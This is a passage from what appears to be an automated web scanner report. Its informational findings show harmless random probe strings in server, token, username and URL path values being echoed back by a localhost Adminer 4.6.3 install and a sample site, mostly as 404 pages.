Request 1

GET /adminer/adminer-4.6.3.php/lz29mou94s HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:04:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:04:06 GMT; path=/adminer/adminer-4.6.3.php/lz29mou94s; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php/lz29mou94s; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NTBiNTgyNmIzNjg0NDhmMzIzMGFiYjA1YTc0NDYwMGY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4289
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="stylesheet" type="text/css" href="lz29mou94s?file=default.css&amp;version=4.6.3">
...[SNIP]...
<script src='lz29mou94s?file=functions.js&amp;version=4.6.3' nonce="NTBiNTgyNmIzNjg0NDhmMzIzMGFiYjA1YTc0NDYwMGY=">
...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="lz29mou94s?file=favicon.ico&amp;version=4.6.3">
...[SNIP]...
<link rel="apple-touch-icon" href="lz29mou94s?file=favicon.ico&amp;version=4.6.3">
...[SNIP]...
<script nonce="NTBiNTgyNmIzNjg0NDhmMzIzMGFiYjA1YTc0NDYwMGY=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'lz29mou94s?', '740364:674133')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
19.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the server request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieMolq4x542tc&username=wWXwJEEF&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:37 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:02:37 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:02:37 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjVkMjMwNzY3YmViZTdiZDUyN2Y0YWFlMWQwNWRiOWM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4514
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieMolq4x542tc - Adminer</title>
...[SNIP]...
script nonce="NjVkMjMwNzY3YmViZTdiZDUyN2Y0YWFlMWQwNWRiOWM=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieMolq4x542tc&username=wWXwJEEF&db=AhfDADgK&', '85229:799636')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</
...[SNIP]...
<input name="auth[server]" value="gPsfQieMolq4x542tc" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
...[SNIP]...
19.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the token request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=qfd3ckvk0mlk5hrpl41rj5kln4; adminer_key=67912841158106235c36bdcddfcda778; adminer_lang=bg

lang=bg&token=815669%3a5748778n6a4kyvfz

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=bg; expires=Sat, 17 Nov 2018 21:03:04 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=67912841158106235c36bdcddfcda778; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZWVhZmFmMDEzMTQxMTNlNzZmMzcxM2RlOTQ4OWY5NTU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4609
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="bg" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>........ - Adminer</title>
<link rel="style
...[SNIP]...
<input type="hidden" name="token" value="815669:5748778n6a4kyvfz">
...[SNIP]...
19.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the username request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEFbtpwx07bk5&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:34 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:04:34 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:34 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTE1YWRlYjRiNGRmYTM0YjBmMTNkMTI0YTVlZTg0NzQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4504
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
YWRlYjRiNGRmYTM0YjBmMTNkMTI0YTVlZTg0NzQ=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEFbtpwx07bk5&db=AhfDADgK&', '815485:69124')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[username]" id="username" value="wWXwJEEFbtpwx07bk5" autocapitalize="off">
...[SNIP]...
19.26. http://localhost/examplewebiste/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistexkkj62st6t/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 298
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistexkkj62st6t/ was not found on this server.</p>
<h
...[SNIP]...
19.27. http://localhost/examplewebiste/about [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/about

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/aboutqx0f3vqiqr HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/aboutqx0f3vqiqr was not found on this server.</p>
...[SNIP]...
19.28. http://localhost/examplewebiste/about [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/about

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste7mtjxg80u3/about HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste7mtjxg80u3/about was not found on this server.</p>
...[SNIP]...
19.29. http://localhost/examplewebiste/config [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/configkm9dio87id HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configkm9dio87id was not found on this server.</p>
...[SNIP]...
19.30. http://localhost/examplewebiste/config [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistesp4xhxzjxm/config HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistesp4xhxzjxm/config was not found on this server.</p>
...[SNIP]...
19.31. http://localhost/examplewebiste/config/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteb5hn88941w/config/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteb5hn88941w/config/ was not found on this server.</p>
...[SNIP]...
19.32. http://localhost/examplewebiste/config/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/configgbbhyfllpz/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configgbbhyfllpz/ was not found on this server.</p>
...[SNIP]...
19.33. http://localhost/examplewebiste/config/config.inc [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/config/config.incywfqlb16b6 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/config/config.incywfqlb16b6 was not found on this server.</p>
...[SNIP]...
19.34. http://localhost/examplewebiste/config/config.inc [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistes6hyhn917t/config/config.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistes6hyhn917t/config/config.inc was not found on this server.</p>
...[SNIP]...
19.35. http://localhost/examplewebiste/config/config.inc [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/configb39jjhw3ia/config.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configb39jjhw3ia/config.inc was not found on this server.</p>
...[SNIP]...
19.36. http://localhost/examplewebiste/config/config.inc.php.bak [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc.php.bak

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/config/config.inc.php.bakbh3rresvnh HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/config/config.inc.php.bakbh3rresvnh was not found on this server.</p>
...[SNIP]...
19.37. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc.php.bak

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste8zvlzrok4c/config/config.inc.php.bak HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste8zvlzrok4c/config/config.inc.php.bak was not found on this server.</p>
...[SNIP]...
19.38. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/config/config.inc.php.bak

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/configjec8cwb5ml/config.inc.php.bak HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/configjec8cwb5ml/config.inc.php.bak was not found on this server.</p>
...[SNIP]...
19.39. http://localhost/examplewebiste/docs/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebister2l39pjp31/docs/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebister2l39pjp31/docs/ was not found on this server.</p>
...[SNIP]...
19.40. http://localhost/examplewebiste/docs/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docswud7e3ln4n/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docswud7e3ln4n/ was not found on this server.</p>
...[SNIP]...
19.41. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/examplewebiste_v1.3.pdf

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/docs/examplewebiste_v1.3.pdf6a2b5njd0g HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:32 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docs/examplewebiste_v1.3.pdf6a2b5njd0g was not found on this server.</p>
...[SNIP]...
19.42. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/examplewebiste_v1.3.pdf

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteod2pbgax2a/docs/examplewebiste_v1.3.pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
